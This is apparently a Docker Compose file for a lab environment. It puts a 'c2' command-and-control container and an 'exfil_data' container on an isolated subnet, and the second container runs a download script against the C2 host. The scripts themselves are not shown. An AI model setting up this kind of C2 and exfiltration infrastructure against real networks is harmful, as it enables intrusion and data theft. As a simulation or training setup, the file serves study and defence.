version: "3.9"
services:
    c2:
        image: c2
        ports:
            - "8000:8000"
        container_name: c2
        networks:
            network:
                ipv4_address: 172.25.0.2
        #command: ["./set_up_server.sh", "172.25.0.3"]
    exfil_data:
        image: exfil_data
        ports:
            - "8080:8080"
        container_name: exfil_data
        environment:
            - C2_IP = 172.25.0.2
        networks:
            network:
                ipv4_address: 172.25.0.3
        command: ["./initial_download.sh", "172.25.0.2"]
        depends_on:
            - c2
networks:
    network:
        driver: bridge
        ipam:
            driver: default
            config:
                - subnet: 172.25.0.0/24
    
                